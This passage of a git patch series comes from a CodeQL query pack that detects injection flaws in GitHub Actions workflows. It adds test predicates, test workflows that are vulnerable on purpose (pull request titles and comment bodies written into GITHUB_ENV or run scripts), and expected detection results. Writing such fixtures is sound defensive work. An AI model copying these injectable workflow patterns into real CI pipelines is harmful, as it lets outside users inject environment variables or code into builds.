$GITHUB_ENV", + "echo VAR15=$(> $GITHUB_ENV", + "echo VAR16=$(cat issue.txt | sed 's/\\r/\\n/g' | grep -ioE '\\s*[a-z0-9_-]+/[a-z0-9_-]+\\s*$' | tr -d ' ') >> $GITHUB_ENV", ] and - extractLineAssignment(t, "OUTPUT", key, value) + extractFileWrite(t, "GITHUB_ENV", content) and + extractVariableAndValue(content, key, value) + ) +} + +query predicate writeToGitHubOutput(string key, string value, string content) { + exists(string t | + t = + [ + "echo \"::set-output name=VAR1::$(> $GITHUB_OUTPUT", + "echo 'VAR5=$(> $GITHUB_OUTPUT", + "echo VAR6=$(> $GITHUB_OUTPUT", + "echo VAR7=$(> \"$GITHUB_OUTPUT\"", + "echo VAR8=$(> ${GITHUB_OUTPUT}", + "echo VAR9=$(> \"${GITHUB_OUTPUT}\"", + ] and + extractFileWrite(t, "GITHUB_OUTPUT", content) and + extractVariableAndValue(content, key, value) + ) +} + +query predicate isBashParameterExpansion(string parameter, string operator, string params) { + exists(string test | + test = + [ + "$parameter1", "${parameter2}", "${!parameter3}", "${#parameter4}", "${parameter5:-value}", + "${parameter6:=value}", "${parameter7:+value}", "${parameter8:?value}", + "${parameter9:=default value}", "${parameter10##*/}", "${parameter11/#pattern/string}", + "${parameter12/%pattern/string}", "${parameter13,pattern}", "${parameter14,,pattern}", + "${parameter15^pattern}", "${parameter16^^pattern}", "${parameter17:start}", + "${parameter18#pattern}", "${parameter19##pattern}", "${parameter20%pattern}", + "${parameter21%%pattern}", "${parameter22/pattern/string}", + "${parameter23//pattern/string}", + ] and + isBashParameterExpansion(test, parameter, operator, params) ) } diff --git a/ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml b/ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml index 0ca7ecdfbde..c2e9e17160d 100644 --- a/ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml +++ b/ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml @@ -27,7 +27,7 @@ jobs: CONFIG_PATH: ${{ inputs.config-path }} run: | echo ${{ inputs.config-path }} - echo "::set-output name=step-output:: $CONFIG_PATH" + echo "::set-output name=step-output::$CONFIG_PATH" - name: Get changed files id: step2 uses: tj-actions/changed-files@v40 diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml index 154a8135bad..7b30ec8b7e4 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml @@ -36,14 +36,14 @@ jobs: run: | { echo 'JSON_RESPONSE<> "$GITHUB_ENV" + echo "$TITLE" echo EOF } >> "$GITHUB_ENV" - env: TITLE: ${{ github.event.pull_request.title }} run: | cat <<-EOF >> "$GITHUB_ENV" - echo "FOO=$TITLE" + FOO=$TITLE EOF - env: TITLE: ${{ github.event.pull_request.head.ref }} @@ -55,6 +55,17 @@ jobs: - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV env: TARGET_BRANCH: ${{ github.event.pull_request.title }} + - run: echo ISSUE_KEY=$(echo "${TITLE}" | grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV + env: + TITLE: ${{ github.event.pull_request.title }} + - env: + TITLE: |- + ${{ github.event.pull_request.title }} + run: | + cat > issue.txt << EOL + ${TITLE} + EOL + echo REPO_NAME=$(cat issue.txt | sed 's/\r/\n/g' | grep -ioE '\s*[a-z0-9_-]+/[a-z0-9_-]+\s*$' | tr -d ' ') >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 369085708a0..ffaaf91e550 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -6,9 +6,10 @@ edges | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | @@ -26,11 +27,13 @@ nodes | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | semmle.label | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | semmle.label | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | semmle.label | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | semmle.label | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | subpaths @@ -42,7 +45,8 @@ subpaths | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | +| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 241a33146b8..28fffe0e5e4 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -6,9 +6,10 @@ edges | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | @@ -26,11 +27,13 @@ nodes | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | semmle.label | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | semmle.label | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | semmle.label | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | semmle.label | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | subpaths diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test5.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test5.yml new file mode 100644 index 00000000000..b9b861bd060 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test5.yml @@ -0,0 +1,13 @@ +name: Test +on: + issue_comment: + +permissions: + contents: write + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo '${{ toJSON(github.event.comment.body).foo }}' + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index ac4761deda1..48412116363 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -234,6 +234,7 @@ nodes | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | +| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | semmle.label | toJSON(github.event.comment.body).foo | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -330,6 +331,7 @@ subpaths | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | +| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index c69af0316bf..d577e2fd732 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -234,6 +234,7 @@ nodes | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | +| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | semmle.label | toJSON(github.event.comment.body).foo | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From 842b741611788964c82caad40ce785ff56305c3b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 31 May 2024 16:02:51 +0200 Subject: [PATCH 0311/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 2736e30331c..84f18e2b521 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.30 +version: 0.0.31 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 451b49ec07e..4a196108be6 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.30 +version: 0.0.31 groups: - actions - queries From 844b6e014bb6aef8c48ba86caba0ed3f34b95480 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 31 May 2024 19:04:32 +0200 Subject: [PATCH 0312/1267] Bump qlpack versions --- ql/lib/codeql/actions/ast/internal/Ast.qll | 10 +++++++--- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- .../CWE-829/UntrustedCheckoutCritical.expected | 2 -- .../Security/CWE-829/UntrustedCheckoutMedium.expected | 2 ++ 5 files changed, 11 insertions(+), 7 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 1094a152126..2b15061be3d 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -818,8 +818,9 @@ class JobImpl extends AstNodeImpl, TJobNode { } private predicate hasPrivilegedTrigger() { - // the Job is triggered by an event other than `pull_request` + 